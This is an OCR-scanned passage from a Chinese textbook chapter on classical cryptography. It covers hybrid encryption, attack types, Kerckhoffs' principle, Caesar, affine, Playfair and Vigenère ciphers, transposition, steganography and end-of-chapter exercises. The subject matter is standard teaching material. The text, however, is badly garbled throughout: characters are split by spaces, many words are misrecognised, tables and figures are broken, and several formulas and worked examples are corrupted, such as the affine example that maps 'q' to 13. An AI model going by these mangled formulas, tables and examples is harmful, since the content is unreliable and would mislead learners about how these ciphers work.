字 , 即 加 解密 过 程 就 是 把 数学 函数 应 用 于 数字 以 创建 另外 一 些 数字 的 过 程 。 

综 上 所 述 , 对 称 加 密 和 非 对 称 加 密 各 自 具 有 自己 的 优点 和 缺点 。 在 现实 应 用 中 ,往往 采 
用 混合 密码 系统 ,如 图 3. 6 所 示 。 发 送 方 将 要 发 送 的 信息 m 用 对 称 密 钥 K 加 密 , 在 将 密 钥 
KK 用 对 方 的 公开 密 钥 Es 加 密 , 将 得 到 的 结果 C 发 送 给 接收 方 。 接 收 方 先 用 自己 的 私有 密 
钥 Ds 解密 得 到 对 称 密 钥 K ,再 用 K 解密 得 到 信息 明文 mw。 简 言 之 即 用 会 话 密 钥 ( 对 称 密 
钥 ) 加 密 信 息 本 身 , 用 非 对 称 加 密 算法 加 密 传送 会 话 密 钥 。 简 单 地 说 ,混合 加 密 就 是 用 公 钥 
技术 加 密 一 个 密 钥 ,再 用 单 钥 技术 加 密 真正 的 消息 。 


采用 传统 密码 体制 进行 通信 
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采用 公开 密 角 密码 体制 对 传统 密码 体 
制 的 密 钥 进 行 加 密 后 的 通信 
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3.6 混合 密码 体制 模型 


混合 密码 体制 既 解 决 了 对 称 加 密 中 需要 安全 分 发 通信 和 密 钥 的 问题 ,也 解决 了 非 对 称 加 
密 中 运算 速度 慢 的 问题 。 混 合 加 密 受 到 各 个 制定 未 来 公 钥 加 密 标准 的 组 织 的 高 度 重视 ， 
ISO 要 求 所 有 公 钥 加 密 候选 都 应 能 够 加 密 任意 长 度 的 消息 ,从 而 必须 适用 于 混合 加 密 。 
3. 密码 体制 的 基本 操作 
1) 代替 
明文 中 的 每 个 (组 ) 元 素 被 映射 为 男 一 个 (组 ) 元 素 一 一 非 线 形变 换 , 如 图 3.7 所 示 。 
T 


10111213141516171819202122232425 
图 3.7 代替 
2) 换 位 
明文 中 的 元 素 被 重新 排列 一 一 线形 变换 ,如 表 3. 2 所 示 。 
表 3.2 换 位 
1 2 3 4 
2 1 4 3 


4. 密码 体制 的 明文 处 理 方 式 
1) 流 密码 (Stream Cipher) 
流 密码 又 称 序列 密码 ,序列 密码 每 次 加 密 一 位 或 一 字 节 的 明文 。 序 列 密码 是 手工 和 机 
械 密 码 时 代 的 主流 ,如 图 3. 8 所 示 (四 表示 异 或 ) 。 
明文 序列 
... 10101101 


ee 密 文 序列 
密 钥 序列 PDB——— .1101100l 


.01110100 


3.8 流 密码 


古典 竹 码 
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秦 于 案例 的 网 络 安全 技术 与 实践 


2) 分 组 密码 (Block Cipher) 

分 组 密码 将 明文 分 成 固定 长 度 的 组 ,用 同一 密 钥 和 算法 对 每 一 块 加 密 ,输出 也 是 固定 长 
度 的 密 文 。 

5. 初等 密码 分 析 

攻击 者 在 不 知道 解密 密 钥 及 通信 者 所 采用 的 加 密 体制 的 细节 条 件 下 ,对 密 文 进行 分 析 ， 
试图 获取 机 密 信息 。 密 码 设计 和 密码 分 析 是 共生 的 、 又 是 互 逆 的 ,两 者 密切 有 关 但 追求 的 目 
标 相反 。 两 者 解决 问题 的 途径 有 很 大 差别 : 密码 设计 是 利用 数学 来 构造 密码 ; 密码 分 析 除 
了 依靠 数学 工程 背景 语言 学 等 知识 外 ,还 要 靠 经 验 、 统 计 , 测 试 、 眼 力 、 直 觉 判 断 能 力 等 ,有 
时 还 靠 点 运气 。 基 本 的 攻击 类 型 如 表 3. 3 所 示 , 其 攻击 难度 逐步 减低 ,防守 难度 逐步 增加 。 


表 3.3 攻击 类 型 
攻击 类 型 攻击 者 拥有 的 资源 
吕 加 密 算 法 , 待 分 析 密 广 
唯 密 文 攻击 。 | 口 截获 的 部 分 密 文 
口 加 密 算 法 , 待 分 析 密 文 
已 知 明文 攻击 。 | 口 截获 用 同一 密 铀 加 密 的 部 分 密 文 和 相应 的 明文 
- 口 加 密 算 法 , 待 分 析 密 文 
选择 密 文 攻击 。 | 口 解密 黑 盒子 ,可 解密 任意 密 文 ( 除 待 分 析 密 文 ) 得 到 相应 的 明文 
- 口 加 密 算法 , 待 分 析 密 广 
选择 明文 攻击 。 | 口 加 密 黑 僵 了 ,可 加 密 任意 明文 得 到 相应 的 密 广 
口 加 密 算法 , 待 分 析 密 广 
选择 文本 攻击 | 口 密码 分 析 员 可 选择 特定 密 文 ( 除 待 分 析 密 文 ), 并 获得 对 应 的 明文 
口 密码 分 析 员 可 选择 特定 明文 ,并 获得 对 应 的 密 广 


基本 的 攻击 方法 如 图 3. 9 所 示 。 
穷 举 破译 法 
数学 分 析 法 


时 序 分 析 
能 量 分 析 


图 3.9 基本 的 攻击 方法 


确定 性 分 析 法 


| 
统计 分 析 法 


攻击 方法 
物理 破译 法 | 


1) 穷 举 破译 法 (Exhaustive Attack Method) 

方法 : 对 截获 的 密 文 依次 用 各 种 可 能 的 密 钥 试 译 ,直到 获得 有 意义 的 明文 ; 或 者 利用 
对 手 已 注入 密 钥 的 加 密 机 (比如 缴获 得 到 ), 对 所 有 可 能 的 明文 依次 加 密 直到 得 出 与 截获 的 
密 文 一 致 的 密 文 。 

对 策 : 将 密 钥 空间 和 明文 空间 设计 得 足够 大 。 

2) 确定 性 分 析 法 

方法 : 利用 一 个 或 几 个 已 知 量 ( 比 如 ,已 知 密 文 或 明文 - 密 文 对 ) 用 数学 关系 式 表 示 出 所 
求 未 知 量 ( 如 密 钥 等 ) 。 已 知 量 和 未 知 量 的 关系 视 加 密 和 解密 算法 而 定 ,寻求 这 种 关系 是 确 
定性 分 析 法 的 关键 步骤 。 

对 策 : 设计 具有 坚实 数学 基础 和 足 够 复杂 的 加 密 函 数 。 


3) 统计 分 析 法 

方法 : 密码 破译 者 对 截获 的 密 文 进行 统计 分 析 , 找 出 其 统计 规律 或 特征 ,并 与 明文 空间 
的 统计 特征 进行 对 照 比较 ,从 中 提取 出 密 文 与 明文 间 的 对 应 关系 ,最 终 确 定 密 钥 或 明文 。 

对 策 : 扰乱 密 文 的 语言 统计 规律 。 

4) 物理 破译 方法 

利用 加 密 执行 时 的 物理 现象 来 确定 密 钥 的 密码 分 析 方 法 ,也 被 称 为 “ 边 信 道 攻击 ” 
(Side-Channel Attack) 。 所 利用 的 物理 现象 有 密码 算法 执行 器 件 ( 加 密 芯 片 ) 的 功 耗 , 各 算 
法 步 执行 时 间 度 量 ,甚至 主机 执行 加 密 任务 时 主板 上 电容 器 发 出 的 声音 等 。 

6. 密码 系统 的 安全 性 

(1) 无 条 件 安全 : 如 果 算 法 产生 的 密 文 不 能 给 出 唯一 决定 相应 明文 的 足够 信息 ,无 论 
截获 多 少 密 文 ,花费 多 少时 间 都 不 能 解密 密 文 。Shannon 指出 , 仅 当 密 钥 至 少 和 明文 一 样 长 
时 达到 无 条 件 安全 。 

(2) 有 条 件 安全 : 把 搭 线 者 提取 明文 信息 的 可 能 性 改 为 搭 线 者 提取 明文 信息 的 可 行 
性 ,这 种 安全 性 称 为 有 条 件 安全 性 , 即 搭 线 者 在 一 定 的 计算 资源 条 件 下 ,他 不 能 从 密 文 恢复 
出 明文 。 

(3) 可 证 明 安全 (Provable Secure) : 将 密码 体制 的 安全 性 归结 为 某 个 数学 难题 ,或 破译 
密码 的 难度 等 价 于 (不 低 于 ) 数 学 上 的 某 个 已 知 难题 。 

(4) 计算 安全 : 破译 密 文 的 代价 超过 被 加 密 信息 的 价值 ; 破译 密 文 所 花 时 间 超 过 信息 
的 有 效 期 。 

7. 密码 系统 的 基本 原则 一 一 柯 克 霍 夫 (Kerckhoffs) 原 则 

柯 克 霍 夫 原 则 是 荷兰 密码 学 家 Kerckhoff 于 1883 年 在 名 著 《 军 事 密码 学 ) 中 提出 的 基 
本 假设 : 加 密 算 法 应 建立 在 算法 的 公开 不 影响 明文 和 密 钥 的 安全 的 基础 上 。 

这 一 原则 已 得 到 普遍 承认 ,成 为 判定 密码 强度 的 衡量 标准 ,实际 上 也 成 为 古典 密码 和 现 
代 密 码 的 分 界线 。 

柯 克 霍 夫 原则 的 优势 : 

(1) 它 是 评估 算法 安全 性 的 唯一 可 用 的 方式 。 因 为 如 果 密 码 算法 保密 的 话 ,密码 算法 
的 安全 强度 无 法 进行 评估 。 

(2) 防止 算法 设计 者 在 算法 中 隐藏 后 门 。 因 为 算法 公开 后 ,密码 学 家 可 以 研究 分 析 是 
否 存在 漏洞 ,同时 也 接受 攻击 者 的 检验 。 

(3) 有 助 于 推广 使 用 。 

当前 网 络 应 用 十 分 普及 ,密码 算法 的 应 用 不 再 局 限于 传统 的 军事 领域 ,只 有 算法 公开 ， 
才 可 能 被 大 多 数 人 接受 并 使 用 ,同时 ,对 用 户 而 言 , 只 需 掌 握 密 钥 就 可 以 使 用 。 


3.4 古典 替换 密码 体制 


3.4.1 古典 单 码 加 密 法 


单 码 加 密 是 一 种 替换 加 密 法 ,其 中 的 每 个 明文 只 能 被 唯一 的 一 个 密 文字 母 所 替换 。 
1. 已 撤 的 决策 : 移 位 密码 
移 位 密码 的 加 密 方法 是 将 明文 字母 按 某 种 方式 进行 移 位 ,如 著名 的 恺 撤 密 码 。 在 移 位 
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贡 w 溃 


基于 案例 的 网 络 安 会 其 术 与 实践 


密码 中 ,将 26 个 英文 字母 依次 与 0,1,2,… ,25 对 应 , 密 文字 母 c 可 以 用 明文 字母 mx 和 密 钥 
& 按 如 下 算法 得 到 : 
c= m+k(mod 26) 
给 定 一 个 密 文字 母 c, 对 应 的 明文 字母 m 可 由 c 和 密 钥 k 按 如 下 算法 得 到 : 
m=c—k(mod 26) 
按照 密码 体制 的 数学 形式 化 定义 , 移 位 密码 体制 描述 为 五 元 组 (P,C,K,E,D), 其 中 : 
P=C=K= Zw=10,1,2,.…,25} 
E={e:: Ze > Zz | em)=m+k (mod 26)} 
D={d,: ZZ | di(c)=c—k (mod 26)} 
已 撤 密 码 是 KK 二 3 的 移 位 密码 , 即 用 每 个 字母 其 后 的 第 三 个 字母 表示 ,解码 的 过 程 只 需 
把 密 文 字母 前 移 3 位 即 可 。 要 注意 的 是 字母 的 顺序 是 循环 的 ,所 以 Z 后面 又 回 到 A。 其 密 
码 本 如 下 : 
明文 为 ABCDEFGHIJ KLMNOPQRSTUVWXYZ 对 应 密 文 为 defghijklmnopq 
rstuvwxyzabece, 
例如 ,明文 : 
CRACK IT 
可 得 , 密 文 : 
FUDFN LW 
在 恺 撤 的 时 代 只 有 贵族 才 识 字 ,要 瞒天过海 是 很 容易 的 。 但 是 在 今天 恺 撤 密码 就 变 得 
很 不 安全 。 因 为 K 仅 有 25 种 可 能 ,只 要 知道 是 用 恺 撤 码 加 密 , 那 么 尝试 25 次 就 可 以 得 到 
明文 。 
案例 : 明文 所 用 的 语言 是 已 知 的 , 且 其 意义 易于 识别 已 知 加 密 和 解密 算法 ; 同时 , 需 破 
译 的 密 文 为 : PHHW PH DIWHU WKH WRJD SDUWB。 
因为 只 有 25 个 可 能 的 密 钥 ,用 穷 举 法 进行 25 次 尝试 ,通过 对 恢复 明文 的 识别 可 以 确定 
明文 及 密 钥 ; 
答案 如 表 3.4 所 示 , 通 常 只 需 对 每 个 密 钥 尝试 前 面 几 个 密 文 的 解密 ,若是 可 识别 明文 即 
可 确定 密 钥 , 然 后 恢复 出 明文 。 


表 3.4 穷 举 攻击 


KEY: PHHW PH DIWHU WKH WRJD SDUWB 
1 oggv og chvgt vjg vqic rctva 
nffu nf bgufs uif uphb qbsuz 


2 
3 meet me after the toga party 
4 


2. 移 位 的 升级 一 一 仿 射 密码 

仿 射 密码 和 移 位 密码 一 样 ,也 是 一 种 替换 密码 。 不 同 的 是 , 移 位 密码 中 ,我 们 使 用 的 是 
模 半 加 ; 而 在 下 面 的 仿 射 密码 中 ,使 用 的 是 模 乘 。 在 安全 性 方面 , 仿 射 密码 同 移 位 密码 一 
样 , 都 是 极其 差 的 ,不 仅 因为 他 们 的 原理 简单 ,更 要 命 的 是 这 两 种 替换 密码 没有 隐藏 明文 的 
字 频 信息 ,这 很 容易 地 导致 破解 者 轻易 攻破 。 


仿 射 密码 算法 如 下 : 

(1) 明 密 文字 母 表 为 Zz 。 

(2) 秘 匙 KK 二 (a,6) € ZisX Zos ,其 中 表示 小 于 26 且 与 26 互 素 的 正 整数 的 集合 。 

(3) 加 密 变 换 为 y= (az 十 6b) mod 26。 

(4) 解密 变换 为 z=a-!(y 一 b) mod 26。 

回顾 : 车 aw 两 数 的 乘积 对 正 整 数 n 取 模 的 结果 为 1。 则 称 a、b 互 为 另外 一 个 的 模 逆 。 
比如 : 3*7 一 21; 21%20 王 1; 所 以 3、7 互 为 20 的 模 逆 。9 * 3 一 27;27%26 王 1; 所 以 9.3 互 
为 26 的 模 闭 。 

案例 : 假设 二 9 和 ,二 2, 明 文字 母 为 q, 则 对 其 用 仿 射 密码 加 密 如 下 : 

先 把 文字 母 为 q 转化 为 数字 13。 由 加 密 算法 得 

c=9X13+2= 119 (mod 26) = 15 

再 把 c==15 转化 为 字母 得 到 密 文 P。 

解密 时 , 先 计 算 k7!。 因 为 9X3 三 1(mod 26) ,因此 Ar: 一 3。 再 由 解密 算法 得 

m= Ai(c 一 如 ) (mod 26) 一 3X(c 一 2) = 3c—6 (mod 26) 
三 45 十 20 (mod 26) = 13 (mod 26) 

对 应 的 明文 字母 为 q。 

3. 福尔摩斯 : 小 人 密码 

福尔摩斯 探 案 集中 的 《跳舞 的 人 》 中 出 现 * 小 人 密码 ”, 如 图 3. 10 所 示 。 在 这 个 故事 里 大 
侦探 面 对 的 难题 就 是 要 破解 这 个 密码 ,得 到 图 画 中 隐 含 的 信息 从 而 获得 破案 的 线索 。 


oe 
Yor 


图 3.10 小 人 密码 


福 侦 探 手中 只 有 这 一 串 小 人 (* 密 文 ") ,如 果 没 有 更 多 的 密 文 更 多 的 线索 是 无 法 得 知 其 
中 意思 的 。 因 为 如 果 一 个 小 人 代表 一 个 字母 , 那 这 么 多 小 人 排 在 一 起 组 成 的 单词 就 有 成 千 
上 万 种 可 能 性 ,根本 无 法 通过 一 一 列举 来 破解 。 图 3. 10 中 的 15 个 小 人 的 组 合 就 有 26” 种 ， 
简直 是 天 文 数字 (当时 并 没有 计算 机 )。 青 者 ,如 果 这 些小 人 每 个 代表 一 个 数字 ,而 这 些 数字 
又 恰恰 对 应 某 本 书 上 某 一 页 的 某 个 字 呢 ? 可 能 性 有 很 多 种 ,单单 赁 这 一 条 线索 来 分 析 推 理 
明文 ,和 里 编 乱 猜 没什么 区 别 。 因 此 可 以 说 ,这 个 密码 是 很 难 攻破 的 。 

绝招 就 是 “统计 分 析 学 9" 一 一 因为 字母 出 现 的 频率 和 字母 之 间 的 组 合 关系 是 有 一 定 规 
律 的 。 密 码 学 家 对 英文 字母 与 出 现 频率 总 结 ,如 表 3.5 所 示 。 

在 26 个 字母 当中 下 出 现 的 频率 是 最 高 的 ,有 12.7%, 因 此 可 以 大 胆 推测 最 多 的 重复 小 
人 就 是 代表 “E”。 知 道 的 小 人 越 多 对 破解 密码 越 有 利 ,再 联系 案情 作 进 一 步 的 推理 就 能 够 
知道 纸 条 上 所 传达 的 信息 ,图 3. 11 是 小 人 密码 的 字母 对 照 表 。 


@ C.E. Shannon 1949 年 第 一 次 透彻 地 阐明 了 密码 分 析 的 真 谤 ,指出 密码 能 够 被 破译 的 最 根本 原因 是 于 明文 空间 
非 均匀 的 统计 特性 。 
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表 3.5 频率 和 字母 之 间 的 统计 
字 母 | 概 率 | 字 和 母 | 概 率 | 字 和 母 | 概 率 | 字 和 母 | 概 率 


A 0.08167 H 0. 06094 O 0.075 

B 0.01492 I 0.06966 P 0.019 V 0.010 
C 0.02782 J 0.00153 Q 0.001 WwW 0.023 
D 0.04253 K 0.008 R 0.060 基 0.001 
E 0. 12702 到 0.040 S 0.063 到 0.020 
F 0.02228 M 0.024 0.091 区 0.001 
G 0.02015 N 0.067 U 0.028 


图 3.11 小 人 密码 字母 对 照 表 


3.4.2 古典 多 码 加 密 法 


多 码 加 密 法 的 目的 是 通过 用 多 个 密 文字 母 来 替换 同一 个 明文 字母 ,从 而 消除 字母 出 现 
频率 的 特性 。 多 码 加 密 法 是 为 了 用 来 对 付 频率 分 析 工 具 , 多 码 加 密 法 也 是 一 种 替换 加 密 法 。 

1， Playfair 密 但 

对 简单 的 单 表 代 换 密码 ,就 算 有 很 大 的 密 钥 空间 也 难保 证 其 安全 性 。 于 是 出 现 了 多 字 
母 代 换 密码 。 最 著名 的 多 字母 代 换 密码 是 Playfair 密码 , 它 把 明文 中 的 双 字 母音 节 作 为 一 
个 单元 并 将 其 转换 成 密 文 的 双 字 母音 节 , 相 同 的 明文 字母 可 能 被 映射 为 不 同 的 密 文字 母 ,以 
此 掩盖 明文 字母 出 现 的 频率 。Playfair 算法 基于 一 个 由 密 钥 词 构成 的 5X5 的 字母 矩阵 ,将 
密 钥 词 填 人 和 矩阵 格子 中 ,再 将 剩余 的 字母 按 字母 表 的 顺序 填 在 矩阵 剩 下 的 格子 里 。 

案例 : 密 钥 词 为 monarchy, 则 由 密 钥 词 构成 的 字母 矩阵 如 表 3.6 所 示 。 


表 3.6 字母 矩阵 
M [0] N A R 
C H ¥ B D 
E F G UJ K 
L P Q S 工 
U V A X Z 


对 明文 按 如 下 规则 一 次 加 密 两 个 字母 : 
。 如 果 该 字母 对 的 两 个 字母 是 相同 的 ,那么 在 它们 之 间 加 一 个 填充 字母 ,如 x。 例 : 


balloon——ba lx lo on 
。 矩 阵 同行 的 明文 字母 对 中 的 字母 由 其 右边 的 字母 来 代 换 。 例 : 
on—NA,ar—RM, 
。 和 矩阵 同 列 的 明文 字母 对 中 的 字母 由 其 下 面 的 字母 来 代 换 。 例 : 
ba 一 一 IJB,mu 一 一 CM 


。 其 他 明文 字母 对 中 的 字母 按 如 下 方式 代 换 : 它 所 在 的 行 是 该 字母 的 所 在 行 , 列 则 为 
另 一 个 字母 的 所 在 列 。 例 : 


lx——SU, lo—PM 


对 Playfair 密码 的 分 析 : Playfair 有 26?- 676 种 字母 对 组 合 , 因 此 对 单个 的 字母 对 进行 
判断 要 困难 得 多 。 字 母 出 现 几 率 一 定 程 度 上 被 均匀 化 ,利用 使 用 频率 分 析 字 母 对 就 更 困难 
一 些 。 但 是 它 的 密 文 依然 保留 了 相当 的 明文 语言 的 结构 信息 , 几 百 个 字母 的 密 文 就 足够 分 
析出 规律 了 。 

2. 维 吉 利 亚 密 码 

维 吉利 亚 (Vigenere) 是 法 国 的 密码 学 专家 ,Vigenere 密码 是 以 他 的 名 字 命 名 的 。 该 密 
码 体制 有 一 个 参数 nw。 在 加 解密 时 同样 把 英文 字母 用 数字 代替 进行 运算 ,并 按 个 字母 一 
组 进行 变换 。 明 、 密 文 空间 及 密 钥 空间 都 是 长 的 英文 字母 串 的 集合 ,因此 可 表示 P==C== 
K 二 (Zzs)"。 加 密 变 换 如 下 : 

。 设 密 钥 二 (ki， ks，…，k,) ,明文 P 一 (oa mz，…， mw) ,加 密 函 数 ee(CP) 一 (cl， 

cas ,Ca) ,其 中 c==Gmi 十 Ri) (mod 26), i 二 1, 2,…, no 

。 对 密 文 c 一 (cy， cz，…， cn), 密 钥 让 = 二 (ky，ks，…,k,), 解 密 变 换 为 di (c) 一 (za ， 

mz， 14) ,其 中 jp; 二 (ci 一 ki) (mod 26), i 二 1, 2,…, no 

案例 : 设 "一 6, 密 钥 是 cipher, 这 相应 于 密 钥 上 一 (2，8,， 15, 7, 4, 17) ,明文 是 this 
cryptosystem is not secure。 试 用 Vigenere 密码 对 其 加 密 。 

解 : 首先 将 明文 按 每 6 个 分 为 一 组 ,然后 与 密 钥 进行 模 26“ 加 ”, 如 表 3.7 所 示 。 


表 3.7 Vigenere 密码 加 密 对 照 表 


t [1 s 好 y p t 0o 全 y 

罗 关 ug 机 8 18 2 24 15 19 14 18 24 
密 钥 2 8 15 7 4 17 2 8 15 7 4 到 
21 15 23 25 6 8 0 23 8 21 22 15 

V 中 X Zz G I X V Ww 人 
明文 3 m i Ss n oO t Ss e C u k - 
18 | 19 4 12 8 el 13 | 14 | 19 | 18 4 2 200 I 4 
ER 2 8 | 怒 : | 六 4 | 17 Ws 
文 20 1 19 19 12 9 15 22 8 25 8 19 22 25 19 
可 TU B J M J 有 于 I Zz 人 Ww Z 

因此 , 密 文 是 


古典 竹 码 


贡 w 站 


蕉 于 案例 的 网 络 安 会 技术 与 实践 


C= VPXZGI AXIVWP UBTTMJ PWIZIT WZT 


Vigenere 密码 分 析 : 这 种 密码 的 强度 在 于 每 个 明文 字母 对 应 着 多 个 密 文 字母 。 字 母 出 
现 的 频率 信息 被 隐藏 了。 但 是 并 非 所 有 的 明文 结构 信息 都 被 隐蔽 ,首先 , 密 钥 是 一 个 密 钥 词 
的 重复 使 用 ,其 次 ,相同 的 字母 组 合 可 能 会 以 相同 的 密 钥 进行 加 密 , 于 是 明文 中 出 现 的 相同 
字母 组 合 , 会 给 分 析 者 提供 有 用 的 信息 。 


3.5 古典 换 位 密码 体制 


换 位 加 密 法 不 是 用 其 他 字母 来 蔡 代 已 有 字母 ,而 是 重新 排列 文本 中 的 字母 。 

古典 置换 加 密 法 是 一 种 简单 的 换 位 加 密 法 ,其 加 密 过 程 类 似 于 洗 一 副 纸牌 。 其 加 解密 
方法 如 下 : 把 明文 字符 以 固定 的 宽度 m( 分 组 长 度 ) 水 平地 ( 按 行 ) 写 在 一 张 纸 上 ( 如 果 最 后 
一 行 不 足 m, 需 要 补充 固定 字符 ), 按 1,2,…,m 的 一 个 置换 x 交换 列 的 位 置 次 序 , 再 按 垂直 
方向 ( 即 按 列 ) 读 出 即 得 密 文 。 

解密 就 是 将 密 文 按 相 同 的 宽度 m 垂直 在 写 在 纸 上 , 按 置换 x 的 逆 置 换 交换 列 的 位 置 次 
序 , 然 后 水 平地 读 出 得 到 明文 。 置 换 x 就 是 密 钥 。 

案例 设 明文 Joker is a murderer, 密 钥 x 二 (4 1)(3 2)( 即 x(C4) 王 1,r(1) 一 4,r(3) 一 2， 
(2) 一 3)， 即 按 4,3,2,1 列 的 次 序 读 出 得 到 密 文 , 试 写 出 加 解密 的 过 程 与 结果 。 

解 : 如 图 3. 12 所 示 ,加 密 时 ,把 明文 字母 按 长 度 为 4 进行 分 组 ,每 组 写成 一 行 ,这 样 明 
文字 母 Joker is a murderer 被 写成 4 行 4 列 ,然后 把 这 4 行 4 列 按 4,3,2,1 列 的 次 序 写 出 得 
到 密 文 。 过 程 与 结果 如 图 3. 1 所 示 。 解 密 时 ,把 密 文 字母 按 4 个 一 列 写 出 ,再 按 x 的 逆 置 换 
重 排列 的 次 序 , 最 后 按 行 写 出 , 即 得 到 明文 。 


明文 : Joker is a murderer 密 文 : eadrksreoiurjrme 
按 4 字 母 一 行 写 出 按 4 字母 一 列 写 出 
joke ekoj 
risa asir 
murd drum 
erer rere 
按 列 写 出 的 顺序 43 2 1 交换 列 的 顺序 43 2 1 
按 列 写 出 密 文 : eadrksreoiurjrme 按 行 写 出 明文 : joker is a murderer 


图 3.12 一 种 置换 密码 


3.6 隐 写 术 : 在 敌人 面前 通信 


隐 写 术 是 信息 隐藏 的 一 种 手段 。 它 隐藏 消息 的 存在 ,本质 上 不 是 一 种 编码 加 密 技 术 , 通 
常 在 一 段 普通 的 文字 中 骨 入 排列 一 些 词汇 或 字母 , 隐 含 地 表达 真正 的 意思 。 一 些 实例 如 下 。 

1. 藏 头 诗 : 水 浒 传 一 一 吴 用 智 赚 玉 麒麟 

梁山 为 了 拉 卢 俊 义 入 伙 ,“ 智 多 星 ” 吴 用 和 宋江 便 生出 一 段 “ 吴 用 智 赚 玉 麒 锯 ”的 故事 来 ， 
利用 卢 俊 义 正 为 躲避 “ 血 光 之 灾 ” 的 怪 恐 心理 ,暗藏 " 卢 俊 义 反 ” 四 字 , 广 为 传 播 。 结 果 , 成 了 


官府 治罪 的 证 据 , 终 于 把 卢 俊 义 “ 通 ” 上 了 梁山 。 卢 俊 义 万 河北 俊杰 ,他 不 仅 急 公 好 义 , 乐 善 
好 施 , 济 人 和 危 困 ,而 且 武 艺 高 强 , 名 闻 四 海 , 人 称 * 河 北 玉 谍 麟 ”>。 梁 山 泊 义 军 头领 宋江 久 慕 他 
的 威名 ,一 心 想 招 取 卢 俊 义 上 山 坐 第 一 把 交椅 , 共 图 大 业 , 蔡 天 行道 。 偏 偏 这 个 卢 俊 义 有 钱 
有 势 ,有 名 有 位 , 吃 不 愁 , 穿 不 愁 ,而 且 满 脑袋 的 忠 君 思想 ,要 他 上 山 造 反 谈 何 容易 ,宋江 常常 
为 此 苦恼 。 军 师 吴 用 ,人 称 * 智 多 星 ”, 为 人 机 人 敏 善 于 谋略 ,凡事 一 经 他 策划 ,没有 办 不 成 的 道 
理 。 所 以 , 当 宋 江 与 他 议 起 此 事 时 , 便 生 出 一 段 *“ 吴 用 智 赚 玉 访 麟 ”的 故事 来 。 当 时 吴 用 扮 成 
一 个 算命 先生 ,悄悄 来 到 卢 俊 义 庄 上 ,利用 卢 俊 义 正 为 躲避 ”* 血 光 之 灾 ” 的 性 恐 心里 , 口 占 四 
句 卦 歌 , 并 让 他 端 书 在 家 宅 的 墙壁 上 。 这 4 句 卦 歌 是 : 芦花 从 中 一 扁舟 , 俊杰 俄 从 此 地 游 ， 
义士 若 能 知 此 理 , 反 躬 难 逃 可 无 忧 。 吴 用 在 这 4 句 卦 歌 里 ,巧妙 地 把 “ 卢 俊 义 反 ? 四 个 字 暗 藏 
于 四 名 之 首 ,而 一 心 躲 避 ”“ 血 光 之 灾 ?” 的 卢 俊 义 哪里 有 心细 察 这 其 中 的 隐秘 呢 。 果 然 ,这 4 句 
诗 写 出 后 ,被 官府 拿 到 了 证 据 , 大 兴 问 罪 之 师 , 到 处 捉拿 卢 俊 义 ,终于 把 他 逼 上 梁山 。 

2. 隐藏 情报 

在 一 段 看 似 普通 的 信息 中 隐藏 着 真正 的 含义 ,如 * 王 先生 : 来 信 收 悉 , 你 的 盛情 真是 难 
以 报答 。 我 已 在 昨天 抵达 广州 ,秋雨 连绵 ,每 天 需 备 伞 一 把 方 能 上 街 , 苦 侨 ,大 约 本 月 中 旬 我 
才能 返回 ,届时 再 见 。" 真 实 的 含义 是 “情报 在 雨 企 把 中 ”。 

3. 英文 实例 

如 图 3. 13 所 示 , 句 中 每 个 词 之 间 的 空格 数目 不 同 , 一 个 空格 表示 0, 两 个 空格 表示 1 ,再 
用 密码 表 翻 译 出 整个 二 进 制 串 的 含义 。 


This book is mostly about cryptography, not steganography. 
口 口 口 口 口 OO 
0 1 0 0 0 0 1 


图 3.13 隐 写 术 英 文 实例 


隐 写 术 有 如 下 缺点 : 形式 简单 但 构造 费时 ,要 大 量 信息 来 隐藏 相对 较 少 的 信息 ; 一 旦 
构造 方法 被 泄露 ,整个 系统 将 失效 ; 无 稳健 性 ,数据 修改 后 隐藏 信息 不 能 被 恢复 。 


3.7 小 结 


古典 密码 本 质 上 是 一 种 以 线性 代数 为 基础 的 密码 形式 ,主要 包括 置换 密码 体制 和 代 换 
密码 体制 。 许 多 文献 直接 将 艺术 密码 归 为 古典 密码 ,古典 密码 也 是 一 种 对 称 密码 。 

就 古典 密码 而 言 , 由 于 算法 相对 简单 ,算法 复杂 度 也 不 高 ,一 种 可 能 的 攻击 方法 是 对 所 
有 可 能 的 密 钥 进行 尝试 的 强力 攻击 , 称 为 穷 举 搜索 攻击 。 

移 位 密码 : 密 钥 空 间 K 二 Zw 一 {1,2,…,25) ,因此 ,最 多 尝试 25 次 即 可 恢复 明文 。 

仿 射 密码 : 密 钥 空间 为 K=={ (ki,k)| ki ,ko€ Zos， 其 中 gcd(k1,26) 二 1} ,ki 可 能 的 取 
值 有 1,3,5,7,9,11,15,17,19,21,23,25, 因 此 ,最 多 尝试 12X26 次 即 可 恢复 明文 。 

对 于 古典 密码 方案 而 言 ,由 于 密 钥 空间 非常 有 限 ,因此 ,很 难 抵抗 穷 举 搜索 攻击 。 另 一 
方面 ,就 英文 而 言 ,一些 古典 密码 方案 不 能 很 好 地 隐藏 明文 消息 的 统计 特征 ,攻击 者 也 可 以 
利用 这 一 弱点 进行 破译 。 

因此 可 以 看 出 ,古典 密码 方案 通常 不 遵循 Kerckhoffs 原则 ,密码 方案 的 保密 性 基于 算 
法 的 保密 。 


古典 竹 码 


贡 w 溃 


基于 案例 的 网 络 安 会 技术 与 实践 


3.8 习 题 


1. 用 两 次 恺 撤 密码 能 提高 安全 性 么 ? 为 什么 ? 为 什么 天 仅 有 25 种 可 能 ? 

2. 密码 体制 定义 中 ,空间 集合 的 大 小 与 安全 有 什么 关系 ? 

3. 古典 密码 体制 中 代 换 密码 有 哪 几 种 ? 各 有 什么 特点 ? 

4. 考古 学 家 发 现 了 一 个 写 有 未 知 文字 的 手稿 ,然后 ,又 在 同一 地 点 发 现 一 个 小 石碑 , 写 
有 一 个 和 和 希腊 语 相同 语言 的 句子 ,运用 这 个 句子 他 们 就 能 读 懂 原 手稿 。 这 是 哪 种 攻击 方法 ? 

5. 爱丽 丝 有 一 个 长 信息 需要 发 送 。 她 运用 单 码 代 换 (替代 ) 密 码 , 认 为 如 果 对 信息 进行 
加 密 , 也 许 会 遭受 敌手 的 单字 母 频率 攻击 。 因 此 ,爱丽 丝 认 为 先 采用 压缩 后 加 密 比 较 好 。 压 
缩 有 作用 吗 ? 她 应 该 在 加 密 前 进行 压缩 还 是 加 密 后 压缩 ? 并 说 明理 由 。 


第 4 章 计算 密码 


很 多 人 觉得 密码 学 是 很 玄妙 的 学 问 ,其 实 , 我 们 只 是 习惯 于 用 数学 方式 思维 而 已 ， 
而 一 旦 养 成 了 这 种 思维 方式 ,数字 在 我 们 眼中 就 像 美妙 的 音符 。 
= 一 下 水 过 


